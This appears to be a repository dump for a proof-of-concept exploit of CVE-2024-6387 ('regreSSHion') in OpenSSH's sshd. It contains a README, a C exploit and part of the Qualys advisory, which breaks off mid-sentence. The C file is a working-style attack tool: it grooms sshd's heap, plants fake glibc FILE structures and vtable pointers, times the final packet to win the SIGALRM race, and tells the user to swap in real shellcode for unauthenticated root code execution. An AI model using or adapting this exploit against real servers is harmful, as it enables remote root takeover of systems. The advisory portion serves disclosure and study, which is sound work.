├── README.md
├── 7etsuo-regreSSHion.c
└── regresshion.txt


/README.md:
--------------------------------------------------------------------------------
 1 | # cve-2024-6387-poc
 2 | > a signal handler race condition in OpenSSH's server (sshd)
 3 | 
 4 | - 7etsuo
 5 | 
 6 | ## Description
 7 | 
 8 | An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (`sshd`) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the `SIGALRM` handler.
 9 | 
10 | ## Exploit Details
11 | 
12 | ### Vulnerability Summary
13 | 
14 | The exploit targets the `SIGALRM` handler race condition in OpenSSH's `sshd`:
15 | - **Affected Versions**: OpenSSH 8.5p1 to 9.8p1.
16 | - **Exploit**: Remote code execution as root due to the vulnerable `SIGALRM` handler calling async-signal-unsafe functions.
17 | 


--------------------------------------------------------------------------------
/7etsuo-regreSSHion.c:
--------------------------------------------------------------------------------
  1 | /** 7etsuo-regreSSHion.c
  2 |  * -------------------------------------------------------------------------
  3 |  * SSH-2.0-OpenSSH_9.2p1 Exploit
  4 |  * -------------------------------------------------------------------------
  5 |  *
  6 |  * Exploit Title  : SSH Exploit for CVE-2024-6387 (regreSSHion)
  7 |  * Author         : 7etsuo
  8 |  * Date           : 2024-07-01
  9 |  *
 10 |  * Description:
 11 |  * Targets a signal handler race condition in OpenSSH's
 12 |  * server (sshd) on glibc-based Linux systems. It exploits a vulnerability
 13 |  * where the SIGALRM handler calls async-signal-unsafe functions, leading
 14 |  * to rce as root.
 15 |  *
 16 |  * Notes:
 17 |  * 1. Shellcode        : Replace placeholder with actual payload.
 18 |  * 2. GLIBC_BASES      : Needs adjustment for specific target systems.
 19 |  * 3. Timing parameters: Fine-tune based on target system responsiveness.
 20 |  * 4. Heap layout      : Requires tweaking for different OpenSSH versions.
 21 |  * 5. File structure offsets: Verify for the specific glibc version.
 22 |  * -------------------------------------------------------------------------
 23 |  */
 24 | 
 25 | #include <stdlib.h>
 26 | #include <unistd.h>
 27 | #include <time.h>
 28 | #include <string.h>
 29 | #include <errno.h>
 30 | #include <fcntl.h>
 31 | #include <stdint.h>
 32 | #include <stdio.h>
 33 | #include <sys/socket.h>
 34 | #include <netinet/in.h>
 35 | #include <arpa/inet.h>
 36 | #include <time.h>
 37 | 
 38 | #define MAX_PACKET_SIZE (256 * 1024)
 39 | #define LOGIN_GRACE_TIME 120
 40 | #define MAX_STARTUPS 100
 41 | #define CHUNK_ALIGN(s) (((s) + 15) & ~15)
 42 | 
 43 | // Possible glibc base addresses (for ASLR bypass)
 44 | uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
 45 | int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]);
 46 | 
 47 | // Shellcode placeholder (replace with actual shellcode)
 48 | unsigned char shellcode[] = "\x90\x90\x90\x90";
 49 | 
 50 | int setup_connection (const char *ip, int port);
 51 | void send_packet (int sock, unsigned char packet_type,
 52 |                   const unsigned char *data, size_t len);
 53 | void prepare_heap (int sock);
 54 | void time_final_packet (int sock, double *parsing_time);
 55 | int attempt_race_condition (int sock, double parsing_time,
 56 |                             uint64_t glibc_base);
 57 | double measure_response_time (int sock, int error_type);
 58 | void create_public_key_packet (unsigned char *packet, size_t size,
 59 |                                uint64_t glibc_base);
 60 | void create_fake_file_structure (unsigned char *data, size_t size,
 61 |                                  uint64_t glibc_base);
 62 | void send_ssh_version (int sock);
 63 | int receive_ssh_version (int sock);
 64 | void send_kex_init (int sock);
 65 | int receive_kex_init (int sock);
 66 | int perform_ssh_handshake (int sock);
 67 | 
 68 | int
 69 | main (int argc, char *argv[])
 70 | {
 71 |   if (argc != 3)
 72 |     {
 73 |       fprintf (stderr, "Usage: %s <ip> <port>\n", argv[0]);
 74 |       exit (1);
 75 |     }
 76 | 
 77 |   const char *ip = argv[1];
 78 |   int port = atoi (argv[2]);
 79 |   double parsing_time = 0;
 80 |   int success = 0;
 81 | 
 82 |   srand (time (NULL));
 83 | 
 84 |   // Attempt exploitation for each possible glibc base address
 85 |   for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
 86 |     {
 87 |       uint64_t glibc_base = GLIBC_BASES[base_idx];
 88 |       printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);
 89 | 
 90 |       // The advisory mentions "~10,000 tries on average"
 91 |       for (int attempt = 0; attempt < 20000 && !success; attempt++)
 92 |         {
 93 |           if (attempt % 1000 == 0)
 94 |             {
 95 |               printf ("Attempt %d of 20000\n", attempt);
 96 |             }
 97 | 
 98 |           int sock = setup_connection (ip, port);
 99 |           if (sock < 0)
100 |             {
101 |               fprintf (stderr, "Failed to establish connection, attempt %d\n",
102 |                        attempt);
103 |               continue;
104 |             }
105 | 
106 |           if (perform_ssh_handshake (sock) < 0)
107 |             {
108 |               fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt);
109 |               close (sock);
110 |               continue;
111 |             }
112 | 
113 |           prepare_heap (sock);
114 |           time_final_packet (sock, &parsing_time);
115 | 
116 |           if (attempt_race_condition (sock, parsing_time, glibc_base))
117 |             {
118 |               printf ("Possible exploitation success on attempt %d with glibc "
119 |                       "base 0x%lx!\n",
120 |                       attempt, glibc_base);
121 |               success = 1;
122 |               break;
123 |             }
124 | 
125 |           close (sock);
126 |           usleep (100000); // 100ms delay between attempts, as mentioned in the
127 |                            // advisory
128 |         }
129 |     }
130 | 
131 |   return !success;
132 | }
133 | 
134 | int
135 | setup_connection (const char *ip, int port)
136 | {
137 |   int sock = socket (AF_INET, SOCK_STREAM, 0);
138 |   if (sock < 0)
139 |     {
140 |       perror ("socket");
141 |       return -1;
142 |     }
143 | 
144 |   struct sockaddr_in server_addr;
145 |   memset (&server_addr, 0, sizeof (server_addr));
146 |   server_addr.sin_family = AF_INET;
147 |   server_addr.sin_port = htons (port);
148 |   if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)
149 |     {
150 |       perror ("inet_pton");
151 |       close (sock);
152 |       return -1;
153 |     }
154 | 
155 |   if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))
156 |       < 0)
157 |     {
158 |       perror ("connect");
159 |       close (sock);
160 |       return -1;
161 |     }
162 | 
163 |   // Set socket to non-blocking mode
164 |   int flags = fcntl (sock, F_GETFL, 0);
165 |   fcntl (sock, F_SETFL, flags | O_NONBLOCK);
166 | 
167 |   return sock;
168 | }
169 | 
170 | void
171 | send_packet (int sock, unsigned char packet_type, const unsigned char *data,
172 |              size_t len)
173 | {
174 |   unsigned char packet[MAX_PACKET_SIZE];
175 |   size_t packet_len = len + 5;
176 | 
177 |   packet[0] = (packet_len >> 24) & 0xFF;
178 |   packet[1] = (packet_len >> 16) & 0xFF;
179 |   packet[2] = (packet_len >> 8) & 0xFF;
180 |   packet[3] = packet_len & 0xFF;
181 |   packet[4] = packet_type;
182 | 
183 |   memcpy (packet + 5, data, len);
184 | 
185 |   if (send (sock, packet, packet_len, 0) < 0)
186 |     {
187 |       perror ("send_packet");
188 |     }
189 | }
190 | 
191 | void
192 | send_ssh_version (int sock)
193 | {
194 |   const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n";
195 |   if (send (sock, ssh_version, strlen (ssh_version), 0) < 0)
196 |     {
197 |       perror ("send ssh version");
198 |     }
199 | }
200 | 
201 | int
202 | receive_ssh_version (int sock)
203 | {
204 |   char buffer[256];
205 |   ssize_t received;
206 |   do
207 |     {
208 |       received = recv (sock, buffer, sizeof (buffer) - 1, 0);
209 |     }
210 |   while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
211 | 
212 |   if (received > 0)
213 |     {
214 |       buffer[received] = '\0';
215 |       printf ("Received SSH version: %s", buffer);
216 |       return 0;
217 |     }
218 |   else if (received == 0)
219 |     {
220 |       fprintf (stderr, "Connection closed while receiving SSH version\n");
221 |     }
222 |   else
223 |     {
224 |       perror ("receive ssh version");
225 |     }
226 |   return -1;
227 | }
228 | 
229 | void
230 | send_kex_init (int sock)
231 | {
232 |   unsigned char kexinit_payload[36] = { 0 };
233 |   send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload));
234 | }
235 | 
236 | int
237 | receive_kex_init (int sock)
238 | {
239 |   unsigned char buffer[1024];
240 |   ssize_t received;
241 |   do
242 |     {
243 |       received = recv (sock, buffer, sizeof (buffer), 0);
244 |     }
245 |   while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
246 | 
247 |   if (received > 0)
248 |     {
249 |       printf ("Received KEX_INIT (%zd bytes)\n", received);
250 |       return 0;
251 |     }
252 |   else if (received == 0)
253 |     {
254 |       fprintf (stderr, "Connection closed while receiving KEX_INIT\n");
255 |     }
256 |   else
257 |     {
258 |       perror ("receive kex init");
259 |     }
260 |   return -1;
261 | }
262 | 
263 | int
264 | perform_ssh_handshake (int sock)
265 | {
266 |   send_ssh_version (sock);
267 |   if (receive_ssh_version (sock) < 0)
268 |     return -1;
269 |   send_kex_init (sock);
270 |   if (receive_kex_init (sock) < 0)
271 |     return -1;
272 |   return 0;
273 | }
274 | 
275 | void
276 | prepare_heap (int sock)
277 | {
278 |   // Packet a: Allocate and free tcache chunks
279 |   for (int i = 0; i < 10; i++)
280 |     {
281 |       unsigned char tcache_chunk[64];
282 |       memset (tcache_chunk, 'A', sizeof (tcache_chunk));
283 |       send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
284 |       // These will be freed by the server, populating tcache
285 |     }
286 | 
287 |   // Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
288 |   for (int i = 0; i < 27; i++)
289 |     {
290 |       // Allocate large chunk (~8KB)
291 |       unsigned char large_hole[8192];
292 |       memset (large_hole, 'B', sizeof (large_hole));
293 |       send_packet (sock, 5, large_hole, sizeof (large_hole));
294 | 
295 |       // Allocate small chunk (320B)
296 |       unsigned char small_hole[320];
297 |       memset (small_hole, 'C', sizeof (small_hole));
298 |       send_packet (sock, 5, small_hole, sizeof (small_hole));
299 |     }
300 | 
301 |   // Packet c: Write fake headers, footers, vtable and _codecvt pointers
302 |   for (int i = 0; i < 27; i++)
303 |     {
304 |       unsigned char fake_data[4096];
305 |       create_fake_file_structure (fake_data, sizeof (fake_data),
306 |                                   GLIBC_BASES[0]);
307 |       send_packet (sock, 5, fake_data, sizeof (fake_data));
308 |     }
309 | 
310 |   // Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
311 |   unsigned char large_string[MAX_PACKET_SIZE - 1];
312 |   memset (large_string, 'E', sizeof (large_string));
313 |   send_packet (sock, 5, large_string, sizeof (large_string));
314 | }
315 | 
316 | void
317 | create_fake_file_structure (unsigned char *data, size_t size,
318 |                             uint64_t glibc_base)
319 | {
320 |   memset (data, 0, size);
321 | 
322 |   struct
323 |   {
324 |     void *_IO_read_ptr;
325 |     void *_IO_read_end;
326 |     void *_IO_read_base;
327 |     void *_IO_write_base;
328 |     void *_IO_write_ptr;
329 |     void *_IO_write_end;
330 |     void *_IO_buf_base;
331 |     void *_IO_buf_end;
332 |     void *_IO_save_base;
333 |     void *_IO_backup_base;
334 |     void *_IO_save_end;
335 |     void *_markers;
336 |     void *_chain;
337 |     int _fileno;
338 |     int _flags;
339 |     int _mode;
340 |     char _unused2[40];
341 |     void *_vtable_offset;
342 |   } *fake_file = (void *)data;
343 | 
344 |   // Set _vtable_offset to 0x61 as described in the advisory
345 |   fake_file->_vtable_offset = (void *)0x61;
346 | 
347 |   // Set up fake vtable and _codecvt pointers
348 |   *(uint64_t *)(data + size - 16)
349 |       = glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps)
350 |   *(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt
351 | }
352 | 
353 | void
354 | time_final_packet (int sock, double *parsing_time)
355 | {
356 |   double time_before = measure_response_time (sock, 1);
357 |   double time_after = measure_response_time (sock, 2);
358 |   *parsing_time = time_after - time_before;
359 | 
360 |   printf ("Estimated parsing time: %.6f seconds\n", *parsing_time);
361 | }
362 | 
363 | double
364 | measure_response_time (int sock, int error_type)
365 | {
366 |   unsigned char error_packet[1024];
367 |   size_t packet_size;
368 | 
369 |   if (error_type == 1)
370 |     {
371 |       // Error before sshkey_from_blob
372 |       packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
373 |                               "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3");
374 |     }
375 |   else
376 |     {
377 |       // Error after sshkey_from_blob
378 |       packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
379 |                               "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9");
380 |     }
381 | 
382 |   struct timespec start, end;
383 |   clock_gettime (CLOCK_MONOTONIC, &start);
384 | 
385 |   send_packet (sock, 50, error_packet,
386 |                packet_size); // SSH_MSG_USERAUTH_REQUEST
387 | 
388 |   char response[1024];
389 |   ssize_t received;
390 |   do
391 |     {
392 |       received = recv (sock, response, sizeof (response), 0);
393 |     }
394 |   while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
395 | 
396 |   clock_gettime (CLOCK_MONOTONIC, &end);
397 | 
398 |   double elapsed
399 |       = (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9;
400 |   return elapsed;
401 | }
402 | 
403 | void
404 | create_public_key_packet (unsigned char *packet, size_t size,
405 |                           uint64_t glibc_base)
406 | {
407 |   memset (packet, 0, size);
408 | 
409 |   size_t offset = 0;
410 |   for (int i = 0; i < 27; i++)
411 |     {
412 |       // malloc(~4KB) - This is for the large hole
413 |       *(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096);
414 |       offset += CHUNK_ALIGN (4096);
415 | 
416 |       // malloc(304) - This is for the small hole (potential FILE structure)
417 |       *(uint32_t *)(packet + offset) = CHUNK_ALIGN (304);
418 |       offset += CHUNK_ALIGN (304);
419 |     }
420 | 
421 |   // Add necessary headers for the SSH public key format
422 |   memcpy (packet, "ssh-rsa ", 8);
423 | 
424 |   // Place shellcode in the heap via previous allocations
425 |   memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13, shellcode,
426 |           sizeof (shellcode));
427 | 
428 |   // Set up the fake FILE structures within the packet
429 |   for (int i = 0; i < 27; i++)
430 |     {
431 |       create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1)
432 |                                       + CHUNK_ALIGN (304) * i,
433 |                                   CHUNK_ALIGN (304), glibc_base);
434 |     }
435 | }
436 | 
437 | int
438 | attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base)
439 | {
440 |   unsigned char final_packet[MAX_PACKET_SIZE];
441 |   create_public_key_packet (final_packet, sizeof (final_packet), glibc_base);
442 | 
443 |   // Send all but the last byte
444 |   if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0)
445 |     {
446 |       perror ("send final packet");
447 |       return 0;
448 |     }
449 | 
450 |   // Precise timing for last byte
451 |   struct timespec start, current;
452 |   clock_gettime (CLOCK_MONOTONIC, &start);
453 | 
454 |   while (1)
455 |     {
456 |       clock_gettime (CLOCK_MONOTONIC, &current);
457 |       double elapsed = (current.tv_sec - start.tv_sec)
458 |                        + (current.tv_nsec - start.tv_nsec) / 1e9;
459 |       if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001))
460 |         { // 1ms before SIGALRM
461 |           if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) < 0)
462 |             {
463 |               perror ("send last byte");
464 |               return 0;
465 |             }
466 |           break;
467 |         }
468 |     }
469 | 
470 |   // Check for successful exploitation
471 |   char response[1024];
472 |   ssize_t received = recv (sock, response, sizeof (response), 0);
473 |   if (received > 0)
474 |     {
475 |       printf ("Received response after exploit attempt (%zd bytes)\n",
476 |               received);
477 |       // Analyze response to determine if we hit the "large" race window
478 |       if (memcmp (response, "SSH-2.0-", 8) != 0)
479 |         {
480 |           printf ("Possible hit on 'large' race window\n");
481 |           return 1;
482 |         }
483 |     }
484 |   else if (received == 0)
485 |     {
486 |       printf (
487 |           "Connection closed by server - possible successful exploitation\n");
488 |       return 1;
489 |     }
490 |   else if (errno == EWOULDBLOCK || errno == EAGAIN)
491 |     {
492 |       printf ("No immediate response from server - possible successful "
493 |               "exploitation\n");
494 |       return 1;
495 |     }
496 |   else
497 |     {
498 |       perror ("recv");
499 |     }
500 |   return 0;
501 | }
502 | 
503 | int
504 | perform_exploit (const char *ip, int port)
505 | {
506 |   int success = 0;
507 |   double parsing_time = 0;
508 |   double timing_adjustment = 0;
509 | 
510 |   for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
511 |     {
512 |       uint64_t glibc_base = GLIBC_BASES[base_idx];
513 |       printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);
514 | 
515 |       for (int attempt = 0; attempt < 10000 && !success; attempt++)
516 |         {
517 |           if (attempt % 1000 == 0)
518 |             {
519 |               printf ("Attempt %d of 10000\n", attempt);
520 |             }
521 | 
522 |           int sock = setup_connection (ip, port);
523 |           if (sock < 0)
524 |             {
525 |               fprintf (stderr, "Failed to establish connection, attempt %d\n",
526 |                        attempt);
527 |               continue;
528 |             }
529 | 
530 |           if (perform_ssh_handshake (sock) < 0)
531 |             {
532 |               fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt);
533 |               close (sock);
534 |               continue;
535 |             }
536 | 
537 |           prepare_heap (sock);
538 |           time_final_packet (sock, &parsing_time);
539 | 
540 |           // Implement feedback-based timing strategy
541 |           parsing_time += timing_adjustment;
542 | 
543 |           if (attempt_race_condition (sock, parsing_time, glibc_base))
544 |             {
545 |               printf ("Possible exploitation success on attempt %d with glibc "
546 |                       "base 0x%lx!\n",
547 |                       attempt, glibc_base);
548 |               success = 1;
549 |               // In a real exploit, we would now attempt to interact with the
550 |               // shell
551 |             }
552 |           else
553 |             {
554 |               // Adjust timing based on feedback
555 |               timing_adjustment += 0.00001; // Small incremental adjustment
556 |             }
557 | 
558 |           close (sock);
559 |           usleep (100000); // 100ms delay between attempts, as mentioned in the
560 |                            // advisory
561 |         }
562 |     }
563 | 
564 |   return success;
565 | }


--------------------------------------------------------------------------------
/regresshion.txt:
--------------------------------------------------------------------------------
   1 | Qualys Security Advisory
   2 | 
   3 | regreSSHion: RCE in OpenSSH's server, on glibc-based Linux systems
   4 | (CVE-2024-6387)
   5 | 
   6 | 
   7 | ========================================================================
   8 | Contents
   9 | ========================================================================
  10 | 
  11 | Summary
  12 | SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3 (Debian 3.0r6, from 2005)
  13 | - Theory
  14 | - Practice
  15 | - Timing
  16 | SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3 (Ubuntu 6.06.1, from 2006)
  17 | - Theory, take one
  18 | - Theory, take two
  19 | - Practice
  20 | - Timing
  21 | SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2 (Debian 12.5.0, from 2024)
  22 | - Theory
  23 | - Practice
  24 | - Timing
  25 | Towards an amd64 exploit
  26 | Patches and mitigation
  27 | Acknowledgments
  28 | Timeline
  29 | 
  30 | 
  31 | ========================================================================
  32 | Summary
  33 | ========================================================================
  34 | 
  35 |     All it takes is a leap of faith
  36 |         -- The Interrupters, "Leap of Faith"
  37 | 
  38 | Preliminary note: OpenSSH is one of the most secure software in the
  39 | world; this vulnerability is one slip-up in an otherwise near-flawless
  40 | implementation. Its defense-in-depth design and code are a model and an
  41 | inspiration, and we thank OpenSSH's developers for their exemplary work.
  42 | 
  43 | We discovered a vulnerability (a signal handler race condition) in
  44 | OpenSSH's server (sshd): if a client does not authenticate within
  45 | LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions),
  46 | then sshd's SIGALRM handler is called asynchronously, but this signal
  47 | handler calls various functions that are not async-signal-safe (for
  48 | example, syslog()). This race condition affects sshd in its default
  49 | configuration.
  50 | 
  51 | On investigation, we realized that this vulnerability is in fact a
  52 | regression of CVE-2006-5051 ("Signal handler race condition in OpenSSH
  53 | before 4.4 allows remote attackers to cause a denial of service (crash),
  54 | and possibly execute arbitrary code"), which was reported in 2006 by
  55 | Mark Dowd.
  56 | 
  57 | This regression was introduced in October 2020 (OpenSSH 8.5p1) by commit
  58 | 752250c ("revised log infrastructure for OpenSSH"), which accidentally
  59 | removed an "#ifdef DO_LOG_SAFE_IN_SIGHAND" from sigdie(), a function
  60 | that is directly called by sshd's SIGALRM handler. In other words:
  61 | 
  62 | - OpenSSH < 4.4p1 is vulnerable to this signal handler race condition,
  63 |   if not backport-patched against CVE-2006-5051, or not patched against
  64 |   CVE-2008-4109, which was an incorrect fix for CVE-2006-5051;
  65 | 
  66 | - 4.4p1 <= OpenSSH < 8.5p1 is not vulnerable to this signal handler race
  67 |   condition (because the "#ifdef DO_LOG_SAFE_IN_SIGHAND" that was added
  68 |   to sigdie() by the patch for CVE-2006-5051 transformed this unsafe
  69 |   function into a safe _exit(1) call);
  70 | 
  71 | - 8.5p1 <= OpenSSH < 9.8p1 is vulnerable again to this signal handler
  72 |   race condition (because the "#ifdef DO_LOG_SAFE_IN_SIGHAND" was
  73 |   accidentally removed from sigdie()).
  74 | 
  75 | This vulnerability is exploitable remotely on glibc-based Linux systems,
  76 | where syslog() itself calls async-signal-unsafe functions (for example,
  77 | malloc() and free()): an unauthenticated remote code execution as root,
  78 | because it affects sshd's privileged code, which is not sandboxed and
  79 | runs with full privileges. We have not investigated any other libc or
  80 | operating system; but OpenBSD is notably not vulnerable, because its
  81 | SIGALRM handler calls syslog_r(), an async-signal-safer version of
  82 | syslog() that was invented by OpenBSD in 2001.
  83 | 
  84 | To exploit this vulnerability remotely (to the best of our knowledge,
  85 | CVE-2006-5051 has never been successfully exploited before), we drew
  86 | inspiration from a visionary paper, "Delivering Signals for Fun and
  87 | Profit", which was published in 2001 by Michal Zalewski:
  88 | 
  89 |   https://lcamtuf.coredump.cx/signals.txt
  90 | 
  91 | Nevertheless, we immediately faced three major problems:
  92 | 
  93 | - From a theoretical point of view, we must find a useful code path
  94 |   that, if interrupted at the right time by SIGALRM, leaves sshd in an
  95 |   inconsistent state, and we must then exploit this inconsistent state
  96 |   inside the SIGALRM handler.
  97 | 
  98 | - From a practical point of view, we must find a way to reach this
  99 |   useful code path in sshd, and maximize our chances of interrupting it
 100 |   at the right time.
 101 | 
 102 | - From a timing point of view, we must find a way to further increase
 103 |   our chances of interrupting this useful code path at the right time,
 104 |   remotely.
 105 | 
 106 | To focus on these three problems without having to immediately fight
 107 | against all the modern operating system protections (in particular, ASLR
 108 | and NX), we decided to exploit old OpenSSH versions first, on i386, and
 109 | then, based on this experience, recent versions:
 110 | 
 111 | - First, "SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3", from
 112 |   "debian-30r6-dvd-i386-binary-1_NONUS.iso": this is the first Debian
 113 |   version that has privilege separation enabled by default and that is
 114 |   patched against all the critical vulnerabilities of that era (in
 115 |   particular, CVE-2003-0693 and CVE-2002-0640).
 116 | 
 117 |   To remotely exploit this version, we interrupt a call to free() with
 118 |   SIGALRM (inside sshd's public-key parsing code), leave the heap in an
 119 |   inconsistent state, and exploit this inconsistent state during another
 120 |   call to free(), inside the SIGALRM handler.
 121 | 
 122 |   In our experiments, it takes ~10,000 tries on average to win this race
 123 |   condition; i.e., with 10 connections (MaxStartups) accepted per 600
 124 |   seconds (LoginGraceTime), it takes ~1 week on average to obtain a
 125 |   remote root shell.
 126 | 
 127 | - Second, "SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3", from
 128 |   "ubuntu-6.06.1-server-i386.iso": this is the last Ubuntu version that
 129 |   is still vulnerable to CVE-2006-5051 ("Signal handler race condition
 130 |   in OpenSSH before 4.4").
 131 | 
 132 |   To remotely exploit this version, we interrupt a call to pam_start()
 133 |   with SIGALRM, leave one of PAM's structures in an inconsistent state,
 134 |   and exploit this inconsistent state during a call to pam_end(), inside
 135 |   the SIGALRM handler.
 136 | 
 137 |   In our experiments, it takes ~10,000 tries on average to win this race
 138 |   condition; i.e., with 10 connections (MaxStartups) accepted per 120
 139 |   seconds (LoginGraceTime), it takes ~1-2 days on average to obtain a
 140 |   remote root shell.
 141 | 
 142 | - Finally, "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2", from
 143 |   "debian-12.5.0-i386-DVD-1.iso": this is the current Debian stable
 144 |   version, and it is vulnerable to the regression of CVE-2006-5051.
 145 | 
 146 |   To remotely exploit this version, we interrupt a call to malloc() with
 147 |   SIGALRM (inside sshd's public-key parsing code), leave the heap in an
 148 |   inconsistent state, and exploit this inconsistent state during another
 149 |   call to malloc(), inside the SIGALRM handler (more precisely, inside
 150 |   syslog()).
 151 | 
 152 |   In our experiments, it takes ~10,000 tries on average to win this race
 153 |   condition, so ~3-4 hours with 100 connections (MaxStartups) accepted
 154 |   per 120 seconds (LoginGraceTime). Ultimately, it takes ~6-8 hours on
 155 |   average to obtain a remote root shell, because we can only guess the
 156 |   glibc's address correctly half of the time (because of ASLR).
 157 | 
 158 | This research is still a work in progress:
 159 | 
 160 | - we have targeted virtual machines only, not bare-metal servers, on a
 161 |   mostly stable network link (~10ms packet jitter);
 162 | 
 163 | - we are convinced that various aspects of our exploits can be greatly
 164 |   improved;
 165 | 
 166 | - we have started to work on an amd64 exploit, which is much harder
 167 |   because of the stronger ASLR.
 168 | 
 169 | A few days after we started our work on amd64, we noticed the following
 170 | bug report (in OpenSSH's public Bugzilla), about a deadlock in sshd's
 171 | SIGALRM handler:
 172 | 
 173 |   https://bugzilla.mindrot.org/show_bug.cgi?id=3690
 174 | 
 175 | We therefore decided to contact OpenSSH's developers immediately (to let
 176 | them know that this deadlock is caused by an exploitable vulnerability),
 177 | we put our amd64 work on hold, and we started to write this advisory.
 178 | 
 179 | 
 180 | ========================================================================
 181 | SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3 (Debian 3.0r6, from 2005)
 182 | ========================================================================
 183 | 
 184 | ------------------------------------------------------------------------
 185 | Theory
 186 | ------------------------------------------------------------------------
 187 | 
 188 |     But that's not like me, I'm breaking free
 189 |         -- The Interrupters, "Haven't Seen the Last of Me"
 190 | 
 191 | The SIGALRM handler of this OpenSSH version calls packet_close(), which
 192 | calls buffer_free(), which calls xfree() and hence free(), which is not
 193 | async-signal-safe:
 194 | 
 195 | ------------------------------------------------------------------------
 196 |  302 grace_alarm_handler(int sig)
 197 |  303 {
 198 |  ...
 199 |  307         packet_close();
 200 | ------------------------------------------------------------------------
 201 |  329 packet_close(void)
 202 |  330 {
 203 |  ...
 204 |  341         buffer_free(&input);
 205 |  342         buffer_free(&output);
 206 |  343         buffer_free(&outgoing_packet);
 207 |  344         buffer_free(&incoming_packet);
 208 | ------------------------------------------------------------------------
 209 |  35 buffer_free(Buffer *buffer)
 210 |  36 {
 211 |  37         memset(buffer->buf, 0, buffer->alloc);
 212 |  38         xfree(buffer->buf);
 213 |  39 }
 214 | ------------------------------------------------------------------------
 215 |  51 xfree(void *ptr)
 216 |  52 {
 217 |  53         if (ptr == NULL)
 218 |  54                 fatal("xfree: NULL pointer given as argument");
 219 |  55         free(ptr);
 220 |  56 }
 221 | ------------------------------------------------------------------------
 222 | 
 223 | Consequently, we started to read the malloc code of this Debian's glibc
 224 | (2.2.5), to see if a first call to free() can be interrupted by SIGALRM
 225 | and exploited during a second call to free() inside the SIGALRM handler
 226 | (at lines 341-344, above). Because this glibc's malloc is not hardened
 227 | against the unlink() technique pioneered by Solar Designer in 2000, we
 228 | quickly spotted an interesting code path in chunk_free() (which is
 229 | called internally by free()):
 230 | 
 231 | ------------------------------------------------------------------------
 232 | 1028 struct malloc_chunk
 233 | 1029 {
 234 | 1030   INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
 235 | 1031   INTERNAL_SIZE_T size;      /* Size in bytes, including overhead. */
 236 | 1032   struct malloc_chunk* fd;   /* double links -- used only if free. */
 237 | 1033   struct malloc_chunk* bk;
 238 | 1034 };
 239 | ------------------------------------------------------------------------
 240 | 2516 #define unlink(P, BK, FD)                                           \
 241 | 2517 {                                                                   \
 242 | 2518   BK = P->bk;                                                       \
 243 | 2519   FD = P->fd;                                                       \
 244 | 2520   FD->bk = BK;                                                      \
 245 | 2521   BK->fd = FD;                                                      \
 246 | 2522 }                                                                   \
 247 | ------------------------------------------------------------------------
 248 | 3160 chunk_free(arena *ar_ptr, mchunkptr p)
 249 | ....
 250 | 3164 {
 251 | 3165   INTERNAL_SIZE_T hd = p->size; /* its head field */
 252 | ....
 253 | 3177   sz = hd & ~PREV_INUSE;
 254 | 3178   next = chunk_at_offset(p, sz);
 255 | 3179   nextsz = chunksize(next);
 256 | ....
 257 | 3230   if (!(inuse_bit_at_offset(next, nextsz)))   /* consolidate forward */
 258 | 3231   {
 259 | ....
 260 | 3241       unlink(next, bck, fwd);
 261 | ....
 262 | 3244   }
 263 | 3245   else
 264 | 3246     set_head(next, nextsz);                  /* clear inuse bit */
 265 | ....
 266 | 3251     frontlink(ar_ptr, p, sz, idx, bck, fwd);
 267 | ------------------------------------------------------------------------
 268 | 
 269 | To exploit this code path, we arrange for sshd's heap to have the
 270 | following layout (chunk_X, chunk_Y, and chunk_Z are malloc()ated chunks
 271 | of memory, and p, s, f, b are their prev_size, size, fd, and bk fields):
 272 | 
 273 | -----|---+---------------|---+---------------|---+---------------|-----
 274 |  ... |p|s|f|b|  chunk_X  |p|s|f|b|  chunk_Y  |p|s|f|b|  chunk_Z  | ...
 275 | -----|---+---------------|---+---------------|---+---------------|-----
 276 |                              |<------------->|
 277 |                                  user data
 278 | 
 279 | - First, if a call to free(chunk_Y) is interrupted by SIGALRM *after*
